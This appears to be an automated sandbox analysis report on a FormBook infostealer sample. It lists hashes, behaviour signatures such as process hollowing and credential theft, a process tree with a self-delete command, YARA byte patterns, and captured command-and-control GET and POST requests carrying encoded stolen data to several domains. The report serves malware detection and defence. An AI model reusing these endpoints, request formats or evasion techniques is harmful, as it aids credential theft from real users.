Analysis Report Scan_06032020.exe

Overview

General Information

Sample Name: Scan_06032020.exe
MD5: c2f53f0cfafa04b343af62cccedcee13
SHA1: b189bf5ac157a99e16b4b81200bb08c6d9b55e7c
SHA256: 459e0f1ce8ec71d78d27f50fa6978046b9fb741f322f66cb300332fce233da25

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Scan_06032020.exe (PID: 2616 cmdline: 'C:\Users\user\Desktop\Scan_06032020.exe' MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
    • Scan_06032020.exe (PID: 4304 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
      • explorer.exe (PID: 2880 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • NETSTAT.EXE (PID: 4024 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 4520 cmdline: /c del 'C:\Users\user\Desktop\Scan_06032020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • ufipp6ljxlz.exe (PID: 4924 cmdline: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
          • ufipp6ljxlz.exe (PID: 4316 cmdline: {path} MD5: C2F53F0CFAFA04B343AF62CCCEDCEE13)
        • wlanext.exe (PID: 4168 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x106519:$sqlite3step: 68 34 1C 7B E1
  • 0x10662c:$sqlite3step: 68 34 1C 7B E1
  • 0x132139:$sqlite3step: 68 34 1C 7B E1
  • 0x13224c:$sqlite3step: 68 34 1C 7B E1
  • 0x106548:$sqlite3text: 68 38 2A 90 C5
  • 0x10666d:$sqlite3text: 68 38 2A 90 C5
  • 0x132168:$sqlite3text: 68 38 2A 90 C5
  • 0x13228d:$sqlite3text: 68 38 2A 90 C5
  • 0x10655b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x106683:$sqlite3blob: 68 53 D8 7F 8C
  • 0x13217b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x1322a3:$sqlite3blob: 68 53 D8 7F 8C
(28 entries in total; the remaining entries are not shown in this extract)

Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
(7 entries in total; the remaining entries are not shown in this extract)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: www.porcber.com | Virustotal: Detection: 7%
Source: http://www.porcber.com | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Qor0xv4i\ufipp6ljxlz.exe | Virustotal: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\Qor0xv4i\ufipp6ljxlz.exe | ReversingLabs: Detection: 48%
Multi AV Scanner detection for submitted file
Source: Scan_06032020.exe | Virustotal: Detection: 16%
Source: Scan_06032020.exe | ReversingLabs: Detection: 48%
Yara detected FormBook
Source: Yara match | File source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE
Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.Scan_06032020.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\Scan_06032020.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi
Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe | Code function: 4x nop then pop edi

Networking:

Uses netstat to query active network connections and open ports
Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected:
  GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=zRviVb12Px76SVCKitHf+uVyG4hjRZm88E4tC4j/EoSJrWOXPrlkHBEChoOc3I+b1pYC HTTP/1.1
  Host: www.icbjesusdenazaret.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /mq3/?qFNHgHIH=2djJOWHKUa/XxXSGb5U/NgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tDbPKdrqRi+&1bxh=3fSHFPhPtFX80vu0 HTTP/1.1
  Host: www.porcber.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtRwHyjq2IhIJtEgxo1RriYdWCfaHj HTTP/1.1
  Host: www.hugoph.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View | IP Address: 199.34.228.59
Source: Joe Sandbox View | ASN Name: unknown (4 identical entries)
Source: global traffic | HTTP traffic detected:
  POST /mq3/ HTTP/1.1
  Host: www.porcber.com
  Connection: close
  Content-Length: 146542
  Cache-Control: no-cache
  Origin: http://www.porcber.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.porcber.com/mq3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 71 46 4e 48 67 48 49 48 3d 7e 5f 76 7a 51 32 6d 62 65 74 69 71 69 55 72 38 43 63 41 35 58 30 48 6b 6e 58 37 39 54 72 5a 48 67 48 7a 5a 45 36 37 69 6a 6b 64 65 33 72 71 41 77 74 7e 7a 70 35 63 73 33 73 28 41 45 75 52 59 75 30 61 48 4e 46 4d 66 64 65 4a 7a 52 4c 68 74 28 6f 6c 43 53 4a 68 50 62 53 49 47 50 33 6a 6f 36 6c 41 30 76 32 61 6f 32 39 66 79 71 72 46 61 59 4a 78 79 66 65 6e 44 78 32 46 7a 37 75 7e 32 30 36 58 39 57 6f 56 6e 45 53 48 6d 79 4c 32 33 49 78 78 70 76 58 52 64 74 5f 56 35 62 76 52 50 66 53 70 43 69 6c 4b 45 53 74 64 7a 65 4c 44 55 28 4c 41 61 46 76 75 7a 37 70 35 4d 65 49 51 6d 57 54 33 76 38 62 4c 6b 36 67 72 68 46 57 34 44 68 75 30 74 79 72 33 68 73 79 28 68 62 65 56 32 79 79 4f 49 51 36 6e 73 42 77 56 61 6f 6a 4f 53 43 49 68 6f 48 54 45 74 6a 50 30 42 50 36 58 4c 66 50 4d 55 44 57 73 48 68 72 6a 46 61 2d 54 6f 48 66 64 71 34 32 50 41 6d 45 44 77 64 7a 49 4f 59 69 39 43 53 36 45 6a 63 4a 74 34 70 63 50 49 55 72 77 5a 48 4a 48 6a 75 31 4c 69 41 63 6b 7a 46 79 45 52 49 34 30 4b 33 79 34 64 4f 62 48 43 78 33 65 53 66 65 32 4b 51 54 67 39 30 47 50 74 44 6e 33 52 6f 50 75 7a 56 75 74 4c 59 64 4b 39 46 39 63 31 4a 63 68 56 4f 7a 7e 30 4c 45 69 69 46 54 70 69 28 45 67 30 35 53 71 73 6e 34 34 4c 74 7a 28 61 39 49 6f 44 6d 48 54 77 6d 42 65 69 65 34 34 4d 35 61 37 4a 7a 4c 69 68 69 70 68 36 31 6f 6a 37 61 6e 76 61 52 45 52 63 72 78 5a 7a 79 63 48 77 38 79 6e 39 75 71 64 71 28 68 47 44 4a 44 4c 73 46 4c 51 6f 7a 65 39 71 35 35 55 35 77 78 63 33 62 6a 77 73 68 34 4c 62 5a 38 51 66 37 64 38 4b 72 6d 5a 68 53 42 6a 64 64 76 76 47 41 4e 
76 56 67 37 44 4e 77 2d 78 7a 79 56 36 6c 4f 31 54 6e 36 71 69 6b 37 33 56 4e 41 42 4e 58 77 53 43 56 64 55 50 61 65 4d 38 76 54 44 71 64 30 4d 55 78 46 54 68 68 55 58 31 4b 4b 5f 73 4b 36 63 70 31 6c 56 6f 69 7e 32 71 44 54 4f 76 4b 37 59 39 46 7a 56 72 6c 47 77 43 50 34 63 74 6e 30 55 74 41 39 4a 64 51 50 6e 52 4c 32 6a 65 32 4a 34 6a 41 5a 55 76 66 76 72 41 51 31 6d 61 69 46 69 51 65 79 51 46 5f 77 58 49 4d 4c 33 67 52 6b 56 79 44 7e 4a 75 4c 30 73 67 61 4f 6e 58 4a 35 65 39 42 67 30 32 44 6e 72 4f 7a 6b 7a 41 75 63 41 36 56 59 52 4d 52 42 71 73 57 53 6f 4a 66 45 6b 45 36 7a 49 45 56 52 59 48 56 46 30 41 30 66 37 79 34 62 65 41 61 79 76 69 57 39 31 4b 6f 64 42 4d 4b 69 31 51 4e 73 47 79 30 62 4a 78 38 78 30 58 52 4f 58 74 72 53 79 4c 79 4f 4b 4e 41 50 46 4a 4c 75 65 65 44 63 51 67 4f 36 7a 56 64 51 48 4d 5f 53 72 6f 6b 42 70 58 62 70 5a 38 48 68 4a 61 4d 34 45 42 4e 59 6f 75 46 64 4f 41 5f 4f 69 7a 61 76 52 7a 4a 70 32 7e 34 39 54 57 2d 39 78 28 68 44 4d 6f 62 55 58 6f 62 31 55 4b 6f 43 49 76 79 6d 4f 6a 5f 31 48 7
Source: global traffic | HTTP traffic detected:
  POST /mq3/ HTTP/1.1
  Host: www.hugoph.com
  Connection: close
  Content-Length: 146542
  Cache-Control: no-cache
  Origin: http://www.hugoph.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.hugoph.com/mq3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 71 46 4e 48 67 48 49 48 3d 43 49 6b 76 4f 68 6a 4d 43 6d 64 32 4b 75 36 6a 4a 51 51 34 62 43 48 39 48 34 6b 7a 69 6a 73 79 67 44 46 4c 6f 76 6c 69 64 68 44 71 69 61 65 51 69 62 45 49 44 67 30 76 72 67 7a 61 46 66 57 68 65 38 6e 43 53 4c 74 58 44 71 66 6d 37 4c 75 78 4a 4a 45 58 52 4d 55 71 66 64 6a 6b 48 4d 70 5a 48 64 33 4f 7a 58 59 45 45 58 50 73 47 49 7a 2d 39 37 35 2d 74 4c 30 6d 77 6f 6d 72 51 5a 4a 63 57 55 55 46 36 41 68 4a 58 44 38 78 44 54 57 75 73 31 78 43 7e 77 53 4e 52 50 38 65 70 70 64 78 41 50 46 4c 49 62 41 4c 46 58 46 31 64 62 59 45 42 75 78 2d 49 45 50 74 6c 63 55 72 76 36 4c 47 63 52 78 48 54 47 62 74 28 65 33 53 33 7a 74 45 55 48 46 31 35 6d 6a 61 70 64 68 71 50 64 56 58 62 46 62 43 70 6e 72 49 6c 73 38 54 69 52 32 61 33 5f 56 68 50 4d 49 4b 39 36 67 6e 37 79 62 32 6d 46 33 4d 52 77 39 68 4f 54 54 54 76 4f 41 63 71 52 79 67 39 35 58 4e 64 45 34 57 51 79 33 48 4d 2d 6e 6e 53 72 42 30 52 55 6f 66 43 6c 49 76 76 76 70 68 5a 46 64 6c 68 4f 33 61 53 45 61 41 69 4a 6c 42 46 52 47 72 55 73 66 45 63 45 63 44 63 53 74 4d 4c 33 61 71 6b 79 62 41 4c 4a 50 30 74 45 51 5f 31 71 33 67 63 41 50 55 64 66 65 32 76 45 6b 49 72 52 57 67 63 5f 46 67 51 4e 33 51 56 61 38 30 71 68 6d 72 6e 68 6b 68 75 49 77 54 6e 50 7e 6f 62 43 66 34 58 6d 72 6b 39 4d 63 37 69 46 6c 38 49 74 72 47 76 72 50 71 69 32 48 5f 76 2d 4d 7a 33 6e 74 37 79 52 72 74 54 4a 66 58 6d 37 54 33 73 43 35 4b 64 68 37 31 37 4d 31 64 6c 47 4d 6c 33 35 47 6d 4e 55 42 52 48 30 35 71 49 74 6f 6e 62 53 39 47 6a 4d 54 6a 36 44 59 59 62 54 72 7a 5a 4e 4c 66 56 39 61 4b 28 36 65 51 45 52 37 
41 68 59 65 45 37 77 59 6b 56 73 72 58 37 39 77 62 6a 74 76 64 69 6a 32 4e 42 34 7e 55 56 6e 62 68 76 66 6a 68 61 37 52 45 74 7a 66 77 6f 39 59 32 4d 4e 30 2d 65 6a 36 42 35 66 73 7a 73 53 78 70 45 32 4e 46 52 42 78 68 79 35 67 78 72 53 4c 56 62 6b 6a 61 6c 43 73 52 4f 65 4b 41 62 38 35 42 34 79 4c 2d 64 53 58 31 6f 56 44 32 54 45 68 79 38 67 35 37 51 41 73 41 66 64 33 5f 50 4e 31 33 72 42 75 65 76 6e 56 78 32 41 4c 43 62 42 72 4a 50 72 28 59 31 75 75 7a 4c 4c 51 54 43 70 77 48 39 36 42 35 39 46 55 5a 68 6d 50 35 62 30 6b 4a 38 68 4a 4e 55 34 38 36 75 69 61 58 6c 42 4f 58 69 71 66 41 38 4b 6e 49 41 74 6e 32 44 75 33 30 64 65 66 59 6d 75 37 57 35 58 34 39 6f 42 73 59 47 6d 38 6c 4f 69 5a 45 69 35 35 32 79 68 50 45 41 70 66 58 30 6b 37 77 47 50 7e 4f 59 4c 7a 64 4d 4c 49 78 78 41 63 32 50 6a 61 36 39 42 65 48 47 50 4d 78 6b 31 75 52 69 6a 6f 71 50 43 55 32 67 74 74 77 71 41 6f 75 56 64 4e 75 55 59 62 67 76 35 79 4e 6d 37 39 6a 58 64 48 42 39 31 61 46 37 79 6d 50 62 6c 7e 36 50 72 59 52 69 73 30 44 4b 4e 78 69 63 49 43 5
Source: global traffic | HTTP traffic detected:
  GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=zRviVb12Px76SVCKitHf+uVyG4hjRZm88E4tC4j/EoSJrWOXPrlkHBEChoOc3I+b1pYC HTTP/1.1
  Host: www.icbjesusdenazaret.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /mq3/?qFNHgHIH=2djJOWHKUa/XxXSGb5U/NgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tDbPKdrqRi+&1bxh=3fSHFPhPtFX80vu0 HTTP/1.1
  Host: www.porcber.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtRwHyjq2IhIJtEgxo1RriYdWCfaHj HTTP/1.1
  Host: www.hugoph.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.icbjesusdenazaret.net
Source: unknown | HTTP traffic detected:
  POST /mq3/ HTTP/1.1
  Host: www.porcber.com
  Connection: close
  Content-Length: 146542
  Cache-Control: no-cache
  Origin: http://www.porcber.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.porcber.com/mq3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 71 46 4e 48 67 48 49 48 3d 7e 5f 76 7a 51 32 6d 62 65 74 69 71 69 55 72 38 43 63 41 35 58 30 48 6b 6e 58 37 39 54 72 5a 48 67 48 7a 5a 45 36 37 69 6a 6b 64 65 33 72 71 41 77 74 7e 7a 70 35 63 73 33 73 28 41 45 75 52 59 75 30 61 48 4e 46 4d 66 64 65 4a 7a 52 4c 68 74 28 6f 6c 43 53 4a 68 50 62 53 49 47 50 33 6a 6f 36 6c 41 30 76 32 61 6f 32 39 66 79 71 72 46 61 59 4a 78 79 66 65 6e 44 78 32 46 7a 37 75 7e 32 30 36 58 39 57 6f 56 6e 45 53 48 6d 79 4c 32 33 49 78 78 70 76 58 52 64 74 5f 56 35 62 76 52 50 66 53 70 43 69 6c 4b 45 53 74 64 7a 65 4c 44 55 28 4c 41 61 46 76 75 7a 37 70 35 4d 65 49 51 6d 57 54 33 76 38 62 4c 6b 36 67 72 68 46 57 34 44 68 75 30 74 79 72 33 68 73 79 28 68 62 65 56 32 79 79 4f 49 51 36 6e 73 42 77 56 61 6f 6a 4f 53 43 49 68 6f 48 54 45 74 6a 50 30 42 50 36 58 4c 66 50 4d 55 44 57 73 48 68 72 6a 46 61 2d 54 6f 48 66 64 71 34 32 50 41 6d 45 44 77 64 7a 49 4f 59 69 39 43 53 36 45 6a 63 4a 74 34 70 63 50 49 55 72 77 5a 48 4a 48 6a 75 31 4c 69 41 63 6b 7a 46 79 45 52 49 34 30 4b 33 79 34 64 4f 62 48 43 78 33 65 53 66 65 32 4b 51 54 67 39 30 47 50 74 44 6e 33 52 6f 50 75 7a 56 75 74 4c 59 64 4b 39 46 39 63 31 4a 63 68 56 4f 7a 7e 30 4c 45 69 69 46 54 70 69 28 45 67 30 35 53 71 73 6e 34 34 4c 74 7a 28 61 39 49 6f 44 6d 48 54 77 6d 42 65 69 65 34 34 4d 35 61 37 4a 7a 4c 69 68 69 70 68 36 31 6f 6a 37 61 6e 76 61 52 45 52 63 72 78 5a 7a 79 63 48 77 38 79 6e 39 75 71 64 71 28 68 47 44 4a 44 4c 73 46 4c 51 6f 7a 65 39 71 35 35 55 35 77 78 63 33 62 6a 77 73 68 34 4c 62 5a 38 51 66 37 64 38 4b 72 6d 5a 68 53 42 6a 64 64 76 76 47 41 4e 76 56 67 
37 44 4e 77 2d 78 7a 79 56 36 6c 4f 31 54 6e 36 71 69 6b 37 33 56 4e 41 42 4e 58 77 53 43 56 64 55 50 61 65 4d 38 76 54 44 71 64 30 4d 55 78 46 54 68 68 55 58 31 4b 4b 5f 73 4b 36 63 70 31 6c 56 6f 69 7e 32 71 44 54 4f 76 4b 37 59 39 46 7a 56 72 6c 47 77 43 50 34 63 74 6e 30 55 74 41 39 4a 64 51 50 6e 52 4c 32 6a 65 32 4a 34 6a 41 5a 55 76 66 76 72 41 51 31 6d 61 69 46 69 51 65 79 51 46 5f 77 58 49 4d 4c 33 67 52 6b 56 79 44 7e 4a 75 4c 30 73 67 61 4f 6e 58 4a 35 65 39 42 67 30 32 44 6e 72 4f 7a 6b 7a 41 75 63 41 36 56 59 52 4d 52 42 71 73 57 53 6f 4a 66 45 6b 45 36 7a 49 45 56 52 59 48 56 46 30 41 30 66 37 79 34 62 65 41 61 79 76 69 57 39 31 4b 6f 64 42 4d 4b 69 31 51 4e 73 47 79 30 62 4a 78 38 78 30 58 52 4f 58 74 72 53 79 4c 79 4f 4b 4e 41 50 46 4a 4c 75 65 65 44 63 51 67 4f 36 7a 56 64 51 48 4d 5f 53 72 6f 6b 42 70 58 62 70 5a 38 48 68 4a 61 4d 34 45 42 4e 59 6f 75 46 64 4f 41 5f 4f 69 7a 61 76 52 7a 4a 70 32 7e 34 39 54 57 2d 39 78 28 68 44 4d 6f 62 55 58 6f 62 31 55 4b 6f 43 49 76 79 6d 4f 6a 5f 31 48 7
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 04 Jun 2020 07:23:52 GMT
  Server: Apache
  Set-Cookie: is_mobile=0; path=/; domain=www.icbjesusdenazaret.net
  Vary: X-W-SSL,User-Agent
  Set-Cookie: language=en; expires=Thu, 18-Jun-2020 07:23:52 GMT; Max-Age=1209600; path=/
  Cache-Control: private
  X-Host: pages23.sf2p.intern.weebly.net
  X-UA-Compatible: IE=edge,chrome=1
  Content-Length: 3803
  Content-Type: text/html; charset=UTF-8
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 35 39 31 32 31 32 39 39 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 